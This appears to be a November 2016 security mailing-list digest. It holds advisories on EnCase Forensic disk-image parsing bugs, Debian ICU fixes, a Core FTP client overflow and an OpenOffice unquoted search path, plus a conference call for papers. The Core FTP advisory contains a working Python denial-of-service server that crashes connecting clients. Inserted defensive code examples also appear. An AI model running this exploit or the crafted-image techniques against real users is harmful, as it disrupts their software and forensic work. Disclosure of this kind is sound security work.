SEC Consult SA-20161128-0 :: DoS & heap-based buffer overflow in Guidance Software EnCase Forensic

2016-11-28 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20161128-0 >
===
              title: Denial of service & heap-based buffer overflow
            product: Guidance Software EnCase Forensic Imager & EnCase Forensic
 vulnerable version: EnCase Forensic Imager <= 7.10
                     EnCase Forensic (tested with version 7.08.00.137)
      fixed version: -
         CVE number: -
             impact: high
           homepage: https://www.guidancesoftware.com/encase-forensic-imager
              found: 2016-09-30
                 by: Wolfgang Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"When time is short and you need to acquire entire volumes or selected
individual folders, EnCase Forensic Imager is your tool of choice. Based on
trusted, industry-standard EnCase Forensic technology, EnCase Forensic Imager:
* Is free to download and use
* Requires no installation
* Is a standalone product that does not require an EnCase Forensic license
* Enables acquisition of local drives (network drives are not able to be
  acquired with Imager)
* Provides easy viewing and browsing of potential evidence files, including
  folder structures and file metadata
* Can be deployed via USB stick and used to perform acquisition of a live
  device"

URL: https://www.guidancesoftware.com/encase-forensic-imager


Business recommendation:

SEC Consult recommends not to use Encase Forensic Imager or the Encase Forensic
Suite until a thorough security review has been performed by security
professionals and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Denial of Service
Several manipulated hard disk images cause Encase Forensic Imager to crash. A
suspect manipulating the hard drive could potentially hinder an investigator
from using Encase Forensic Imager for creating hard disk images.
Encase Forensic (v7) has been tested and found to be affected as well.

2) Heap-based buffer overflow
Using a manipulated ReiserFS image an attacker can overwrite heap memory on the
investigator's machine. Because of several restrictions SEC Consult was unable
to create an exploit that works reliably within a reasonable timeframe.
However, as with most heap-based buffer overflow vulnerabilities it is possible
that an attacker could gain arbitrary code execution nevertheless.


Proof of concept:
---
SEC Consult has created proof of concept disk images that will crash Encase.
Those PoC images will not be released.

1) Denial of Service
The following list demonstrates cases that cause Encase to crash. The
investigators would be unable to analyze the hard disk/partition/image using the
affected products:
 * Ext3:
   - Several conditions cause Encase Forensic Imager to encounter a div/0
     exception. Disk images that were manipulated in the following way
     demonstrate this issue. Those crashes have not been further
     investigated as to whether code execution is possible.
     + number of blocks per group: 0x
     + total number of blocks: 0x
     + last mount path: 'A'*10
     + volume name: 'A'*10
     + block number of the superblock: 0
     + FS-Id: 'A'*10
   - Manipulating the size of the inode structure value (e.g. 0x) causes
     Encase Forensic Imager to write beyond the limits of a previously
     allocated (VirtualAlloc) segment.
 * Iso9660:
   - If the length of a file name is specified in a way that it would exceed
     the end of the last block, Encase Forensic Imager crashes while trying to
     read beyond an allocated segment.
 * ReiserFs:
   - When setting a block size of below 0x200 the application overwrites heap
     memory with attacker-supplied data.
 * GPT:
   - When specifying an overly long name (in our setup longer than 0x3fc6) for a
     partition, Encase Forensic crashes failing to read memory when trying to
     determine the length of the string. The partition table can be constructed
     in a way that it can also be used for storing data. However, an investigator
     using Encase will not be able to analyze it.

2) Heap-based buffer overflow
The manipulated ReiserFs image that causes the application to overwrite heap
memory can be tuned to overwrite heap-data with attacker-controlled data.

The application calculates a value (here called "dev_block_count") as:

dev_block_count =
   blocksize from image (e.g. 0x200)
 / blocksize of reading device (typically 0x200)
 * number of blocks

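Added example (not code from the SEC Consult advisory or from EnCase): the dev_block_count arithmetic above in Python, first exactly as described with truncating integer division, then with the checks a parser of untrusted superblocks needs. The advisory is cut off before it says how the count is used; the example assumes it sizes a heap buffer that the image's blocks are then copied into, and the function names, the power-of-two rule and the 32-bit bound are assumptions.

```python
def dev_block_count_unchecked(fs_blocksize: int, dev_blocksize: int, nblocks: int) -> int:
    """The advisory's formula evaluated left to right with truncating integer
    division, as native code would: (fs_blocksize / dev_blocksize) * nblocks.
    For fs_blocksize < dev_blocksize the quotient is 0 and so is the count."""
    return fs_blocksize // dev_blocksize * nblocks


def copy_would_overflow(fs_blocksize: int, dev_blocksize: int, nblocks: int) -> bool:
    """Assumed use of the count: a buffer of count * dev_blocksize bytes receives
    nblocks * fs_blocksize bytes of image data. True means the copy runs past
    the buffer, which is the heap overwrite the advisory describes."""
    allocated = dev_block_count_unchecked(fs_blocksize, dev_blocksize, nblocks) * dev_blocksize
    needed = nblocks * fs_blocksize
    return needed > allocated


def dev_block_count_checked(fs_blocksize: int, dev_blocksize: int, nblocks: int,
                            max_bytes: int = 2**32 - 1) -> int:
    """Same quantity, but reject superblock values for which the formula loses
    information: the file-system block size must be a power of two that is a
    multiple of the device block size (so the division is exact and non-zero),
    and the byte total must fit the assumed 32-bit size field."""
    if fs_blocksize <= 0 or dev_blocksize <= 0 or nblocks < 0:
        raise ValueError("block sizes must be positive and block count non-negative")
    if fs_blocksize & (fs_blocksize - 1):
        raise ValueError("file-system block size is not a power of two")
    if fs_blocksize < dev_blocksize or fs_blocksize % dev_blocksize:
        raise ValueError("file-system block size must be a multiple of the device block size")
    count = (fs_blocksize // dev_blocksize) * nblocks
    if count * dev_blocksize > max_bytes:
        raise ValueError("image would exceed the addressable buffer size")
    return count


if __name__ == "__main__":
    # Constructed values: a 0x100-byte block size read from an untrusted image,
    # a 0x200-byte device block size, and 100 blocks claimed by the superblock.
    print(dev_block_count_unchecked(0x100, 0x200, 100))     # 0
    print(copy_would_overflow(0x100, 0x200, 100))           # True
    print(dev_block_count_checked(0x1000, 0x200, 100))      # 800
```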

[SECURITY] [DSA 3725-1] icu security update

2016-11-28 Thread Luciano Bello

---
Debian Security Advisory DSA-3725-1                   secur...@debian.org
https://www.debian.org/security/                            Luciano Bello
November 27, 2016                     https://www.debian.org/security/faq
---

Package: icu
CVE ID     : CVE-2014-9911 CVE-2015-2632 CVE-2015-4844 CVE-2016-0494
             CVE-2016-6293 CVE-2016-7415
Debian Bug : 838694

Several vulnerabilities were discovered in the International Components
for Unicode (ICU) library.

CVE-2014-9911

Michele Spagnuolo discovered a buffer overflow vulnerability which
might allow remote attackers to cause a denial of service or possibly
execute arbitrary code via crafted text.

CVE-2015-2632

An integer overflow vulnerability might lead to a denial of service
or disclosure of a portion of application memory if an attacker has
control of the input file.

CVE-2015-4844

Buffer overflow vulnerabilities might allow an attacker with control
of the font file to perform a denial of service attack or,
possibly, execute arbitrary code.

CVE-2016-0494

Integer signedness issues were introduced as part of the
CVE-2015-4844 fix.

CVE-2016-6293

A buffer overflow might allow an attacker to perform a denial of
service or disclosure of a portion of application memory.

CVE-2016-7415

A stack-based buffer overflow might allow an attacker with control on
the locale string to perform a denial of service and, possibly,
execute arbitrary code.

For the stable distribution (jessie), these problems have been fixed in
version 52.1-8+deb8u4.

For the unstable distribution (sid), these problems have been fixed in
version 57.1-5.

We recommend that you upgrade your icu packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Core FTP LE v2.2 Remote SSH/SFTP Buffer Overflow

2016-11-28 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===
www.coreftp.com



Product:

Core FTP LE (client)
v2.2 build 1883 

Core FTP LE - free Windows software that includes the client FTP features you 
need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and drop 
support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and much, 
much more.



Vulnerability Type:

Remote SSH/SFTP Buffer Overflow 



CVE Reference:
===
N/A



Vulnerability Details:
===

Core FTP client is vulnerable to remote buffer overflow denial of service when 
connecting to a malicious server using
SSH/SFTP protocol.

Upon receiving an overly long string of junk from the malicious FTP server 
response, Core FTP crashes and the stack
is corrupted with several registers EBX, EDX, EDI being overwritten as can be 
seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c0000005 (first/second chance not available)
eax=035b ebx=4141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=




Exploit code(s):
===

import socket

print('hyp3rlinx - Apparition Security')
print('Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n')
host = '127.0.0.1'
port = 22

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

# Overly long "server response" line that the client fails to bound-check
payload = b"A" * 77500
s.bind((host, port))
s.listen(5)

print('Listening on port... %i' % port)
print('Connect to me!')

while True:
    # Each client that connects receives the oversized line and is then disconnected
    conn, addr = s.accept()
    conn.sendall(payload + b'\r\n')
    conn.close()



Exploitation Technique:
===
Remote



Severity Level:
===
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


WorldCIST'2017 - Submission deadline: November 30

2016-11-28 Thread ML
* Best papers published in several SCI/SSCI-indexed journals
** Proceedings by Springer, indexed by ISI, Scopus, DBLP, EI-Compendex, etc.

-
WorldCIST'17 - 5th World Conference on Information Systems and Technologies 
Porto Santo Island, Madeira, Portugal
11th-13th of April 2017
http://www.worldcist.org/
-


SCOPE

The WorldCist'17 - 5th World Conference on Information Systems and 
Technologies, to be held at Porto Santo Island, Madeira, Portugal, 11 - 13 
April 2017, is a global forum for researchers and practitioners to present and 
discuss the most recent innovations, trends, results, experiences and concerns 
in the several perspectives of Information Systems and Technologies.

We are pleased to invite you to submit your papers to WorldCist'17 
(http://www.worldcist.org/). All submissions will be reviewed on the basis of 
relevance, originality, importance and clarity.


THEMES

Submitted papers should be related with one or more of the main themes proposed 
for the Conference:

A) Information and Knowledge Management (IKM);
B) Organizational Models and Information Systems (OMIS);
C) Software and Systems Modeling (SSM);
D) Software Systems, Architectures, Applications and Tools (SSAAT);
E) Multimedia Systems and Applications (MSA);
F) Computer Networks, Mobility and Pervasive Systems (CNMPS);
G) Intelligent and Decision Support Systems (IDSS);
H) Big Data Analytics and Applications (BDAA);
I) Human-Computer Interaction (HCI);
J) Ethics, Computers and Security (ECS)
K) Health Informatics (HIS);
L) Information Technologies in Education (ITE);
M) Information Technologies in Radiocommunications (ITR).


TYPES of SUBMISSIONS AND DECISIONS

Four types of papers can be submitted:

- Full paper: Finished or consolidated R works, to be included in one of the 
Conference themes. These papers are assigned a 10-page limit.

- Short paper: Ongoing works with relevant preliminary results, open to 
discussion. These papers are assigned a 7-page limit.

- Poster paper: Initial work with relevant ideas, open to discussion. These 
papers are assigned to a 4-page limit.

- Company paper: Companies' papers that show practical experience, R & D, 
tools, etc., focused on some topics of the conference. These papers are 
assigned to a 4-page limit.

Submitted papers must comply with the format of Advances in Intelligent Systems 
and Computing Series (see Instructions for Authors at Springer Website or 
download a DOC example), be written in English, must not have been published 
before, not be under review for any other conference or publication and not 
include any information leading to the authors’ identification. Therefore, the 
authors’ names, affiliations and bibliographic references should not be 
included in the version for evaluation by the Program Committee. This 
information should only be included in the camera-ready version, saved in Word 
or Latex format and also in PDF format. These files must be accompanied by the 
Consent to Publication form filled out, in a ZIP file, and uploaded at the 
conference management system.

All papers will be subjected to a “double-blind review” by at least two members 
of the Program Committee.

Based on Program Committee evaluation, a paper can be rejected or accepted by 
the Conference Chairs. In the latter case, it can be accepted as the type 
originally submitted or as another type. Thus, full papers can be accepted as 
short papers or poster papers only. Similarly, short papers can be accepted as 
poster papers only. In these cases, the authors will be allowed to maintain the 
original number of pages in the camera-ready version.

The authors of accepted poster papers must also build and print a poster to be 
exhibited during the Conference. This poster must follow an A1 or A2 vertical 
format. The Conference can include Work Sessions where these posters are 
presented and orally discussed, with a 5 minute limit per poster.

The authors of accepted full papers will have 15 minutes to present their work 
in a Conference Work Session; approximately 5 minutes of discussion will follow 
each presentation. The authors of accepted short papers and company papers will 
have 11 minutes to present their work in a Conference Work Session; 
approximately 4 minutes of discussion will follow each presentation.


PUBLICATION & INDEXING

To ensure that a full paper, short paper, poster paper or company paper is 
published in the Proceedings, at least one of the authors must be fully 
registered by the 8th of January 2017, and the paper must comply with the 
suggested layout and page-limit. Additionally, all recommended changes must be 
addressed by the authors before they submit the camera-ready version.

No more than one paper per registration will be published in the Conference 
Proceedings. An extra fee must be paid for publication of 

CVE 2016-6803: Apache OpenOffice Unquoted Search Path Vulnerability

2016-11-28 Thread Apache OpenOffice Security


CVE-2016-6803

Apache OpenOffice Advisory


Title: Windows Installer Can Enable Privileged Trojan Execution

Version 1.0
Announced October 11, 2016

Description

The Apache OpenOffice installer for Windows contained a defective
operation that could trigger execution of unwanted software
installed by a Trojan Horse application.  The installer defect 
is known as an "unquoted Windows search path vulnerability."

In the case of Apache OpenOffice installers for Windows, the PC must
have previously been infected by a Trojan Horse application (or user) 
running with administrator privilege.  Any installer with the unquoted 
search path vulnerability becomes a delayed trigger for the exploit.  
The exploit may already have operated on the user's PC.

Severity: Medium

There are no known exploits of this vulnerability.
A proof-of-concept demonstration exists.

Vendor: The Apache Software Foundation

Versions Affected:

All Apache OpenOffice versions 4.1.2 and older 
are affected.  Old OpenOffice.org versions are also
affected.


Mitigation:

Install Apache OpenOffice 4.1.3 for the latest maintenance and 
cumulative security fixes.  Use .

If instead of a typical installation you use a custom-installation
option to change the location where Apache OpenOffice is installed,
use a location that has no spaces in its full-path name.


Defenses and Work-Arounds:

If you are unable to update to 4.1.3, there are other 
precautions that can be taken.  These precautions are also 
recommended as protection against other software that may 
have the unquoted search path vulnerability.

Ensure that there are no programs installed at the
top-level folder (usually C:\) where Windows is installed.  
All are dangerous, especially ones named "Program", whether
"Program.exe" or some other variation.

If such programs are found, install or update to current 
anti-virus/-malware software.  Perform a complete system scan.  
The scan may provide for removal of programs where there should 
not be any.  If that does not happen, it is necessary to remove
any Program.exe and others manually using administrator privilege.
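Added example, not part of the Apache OpenOffice advisory: a small audit in Python that lists the executables Windows CreateProcess probes for an unquoted program path containing spaces (the documented behaviour behind the "Program.exe" warning above) and reports any that already exist on disk. The function names and the sample install path are constructed, and the file-existence check is injectable so the audit runs offline.

```python
import ntpath
import os
from typing import Callable, List


def unquoted_probe_paths(program_path: str) -> List[str]:
    """Paths Windows CreateProcess tries, in order, for an unquoted program
    path that contains spaces: every prefix ending before a space, with ".exe"
    appended when that prefix has no extension, and finally the full path the
    installer meant. A quoted path is unambiguous and yields itself only."""
    if program_path.startswith('"'):
        return [program_path[1:program_path.index('"', 1)]]
    parts = program_path.split(' ')
    probes = []
    for i in range(1, len(parts) + 1):
        candidate = ' '.join(parts[:i])
        if not ntpath.splitext(candidate)[1]:   # ntpath handles backslashes on any OS
            candidate += '.exe'
        probes.append(candidate)
    return probes


def hijack_candidates(program_path: str,
                      exists: Callable[[str], bool] = os.path.exists) -> List[str]:
    """Probed paths other than the intended one that already exist on disk.
    Any hit is the planted-binary situation the advisory warns about (for
    example C:\\Program.exe) and deserves a malware scan and removal."""
    probes = unquoted_probe_paths(program_path)
    return [p for p in probes[:-1] if exists(p)]


if __name__ == "__main__":
    # Constructed sample path; the real install location varies by system.
    sample = r"C:\Program Files\OpenOffice 4\program\soffice.exe"
    for p in unquoted_probe_paths(sample):
        print(p)
    print("existing hijack candidates:", hijack_candidates(sample))
```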


Further Information:

For additional information and assistance, consult the Apache
OpenOffice Community Forums,  or 
make requests to the  public
mailing list.  Defects not involving suspected security
vulnerabilities can be reported via
.

  
The latest information on Apache OpenOffice security bulletins 
can be found at the Bulletin Archive page 
.

Credits: 

The Apache OpenOffice project acknowledges the reporting and
analysis for CVE-2016-6803 by Cyril Vallicari.
